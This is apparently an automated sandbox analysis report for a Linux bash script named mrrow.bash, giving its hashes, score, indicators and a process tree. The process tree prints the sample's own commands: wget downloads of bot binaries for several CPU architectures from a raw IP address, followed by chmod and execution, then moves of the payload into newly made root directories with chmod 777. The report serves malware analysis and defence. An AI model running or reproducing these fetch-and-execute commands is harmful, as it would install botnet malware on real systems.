2db0ba4efda0653533e32abca1417cafb84f58322dc8d4df183e64771626b826 | Triage

Resubmissions

09-08-2022 19:31

220809-x8ezrafabp 5

09-08-2022 19:22

220809-x28cqaehdq 5

09-08-2022 19:21

220809-x2ny3sgec6 5

Analysis

max time kernel
0s
max time network
158s
platform
linux_armhf
resource
debian9-armhf-en-20211208
resource tags

arch:armhfimage:debian9-armhf-en-20211208kernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
09-08-2022 19:22

Sharing

Report Analysis Logs

General

Target

mrrow.bash
Size

2KB
MD5

9486bdff70b6ec6243b012a91e90c21e
SHA1

2364e70ee0d49e4e641fa7428958f5907a8c26a3
SHA256

2db0ba4efda0653533e32abca1417cafb84f58322dc8d4df183e64771626b826
SHA512

e64e2324c403d967d3d04140bb0eba159e57b83db09fdd50e882a8edc595211837505c86c1d44a65d11b9c3a34c0d02496b3c06f264e1175e248397e9716b4bd

Score

5^/10

Malware Config

Signatures

Reads runtime system information 6 IoCs

Reads data from /proc virtual filesystem.

Processes:

mvmkdirmvmkdir

description	ioc	process
/proc/filesystems	/proc/filesystems	mv
/proc/398/exe	/proc/398/exe
/proc/filesystems	/proc/filesystems	mkdir
/proc/filesystems	/proc/filesystems	mv
/proc/387/exe	/proc/387/exe
/proc/filesystems	/proc/filesystems	mkdir

Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

Processes:

mrrow.bash

description ioc process

/tmp/mrrow.bash /tmp/mrrow.bash mrrow.bash

/tmp/mrrow.bash
/tmp/mrrow.bash sudo
1⤵
- Writes file to tmp directory
PID:355

/usr/bin/wget
wget http://109.206.241.211/bins/bot.mips
2⤵
PID:356

/bin/cat
cat bot.mips
2⤵
PID:362

/bin/chmod
chmod +x bot.mips fuwwyowo mrrow.bash systemd-private-fe6e25270ab24b498dda7e817c5daab8-systemd-timesyncd.service-twUfq5
2⤵
PID:363

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:364

/usr/bin/wget
wget http://109.206.241.211/bins/bot.mpsl
2⤵
PID:366

/bin/cat
cat bot.mpsl
2⤵
PID:368

/bin/chmod
chmod +x bot.mips bot.mpsl fuwwyowo mrrow.bash systemd-private-fe6e25270ab24b498dda7e817c5daab8-systemd-timesyncd.service-twUfq5
2⤵
PID:369

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:370

/usr/bin/wget
wget http://109.206.241.211/bins/bot.arm
2⤵
PID:374

/bin/cat
cat bot.arm
2⤵
PID:377

/bin/chmod
chmod +x bot.arm bot.mips bot.mpsl fuwwyowo mrrow.bash systemd-private-fe6e25270ab24b498dda7e817c5daab8-systemd-timesyncd.service-twUfq5
2⤵
PID:378

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:379

/usr/bin/wget
wget http://109.206.241.211/bins/bot.arm5
2⤵
PID:380

/bin/cat
cat bot.arm5
2⤵
PID:382

/bin/chmod
chmod +x bot.arm bot.arm5 bot.mips bot.mpsl fuwwyowo mrrow.bash systemd-private-fe6e25270ab24b498dda7e817c5daab8-systemd-timesyncd.service-twUfq5
2⤵
PID:383

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:384

/usr/bin/wget
wget http://109.206.241.211/bins/bot.arm6
2⤵
PID:386

/bin/cat
cat bot.arm6
2⤵
PID:394

/bin/chmod
chmod +x bot.arm bot.arm5 bot.arm6 bot.mips bot.mpsl fuwwyowo mrrow.bash systemd-private-fe6e25270ab24b498dda7e817c5daab8-systemd-timesyncd.service-twUfq5
2⤵
PID:395

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:396

/usr/bin/wget
wget http://109.206.241.211/bins/bot.arm7
2⤵
PID:399

/bin/sh
sh -c "mkdir /qaujoxnrr1/ && >/qaujoxnrr1/qaujoxnrr1 && cd /qaujoxnrr1/ >/dev/null"
1⤵
PID:388

/bin/mkdir
mkdir /qaujoxnrr1/
2⤵
- Reads runtime system information
PID:389

/bin/sh
sh -c "mv /tmp/fuwwyowo /qaujoxnrr1/qaujoxnrr1 && chmod 777 /qaujoxnrr1/qaujoxnrr1 >/dev/null"
1⤵
PID:390

/bin/mv
mv /tmp/fuwwyowo /qaujoxnrr1/qaujoxnrr1
2⤵
- Reads runtime system information
PID:391

/bin/chmod
chmod 777 /qaujoxnrr1/qaujoxnrr1
2⤵
PID:393

/bin/sh
sh -c "mkdir /d691shta9j/ && >/d691shta9j/d691shta9j && cd /d691shta9j/ >/dev/null"
1⤵
PID:400

/bin/mkdir
mkdir /d691shta9j/
2⤵
- Reads runtime system information
PID:401

/bin/sh
sh -c "mv /tmp/fuwwyowo /d691shta9j/d691shta9j && chmod 777 /d691shta9j/d691shta9j >/dev/null"
1⤵
PID:402

/bin/mv
mv /tmp/fuwwyowo /d691shta9j/d691shta9j
2⤵
- Reads runtime system information
PID:403

/bin/chmod
chmod 777 /d691shta9j/d691shta9j
2⤵
PID:405

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...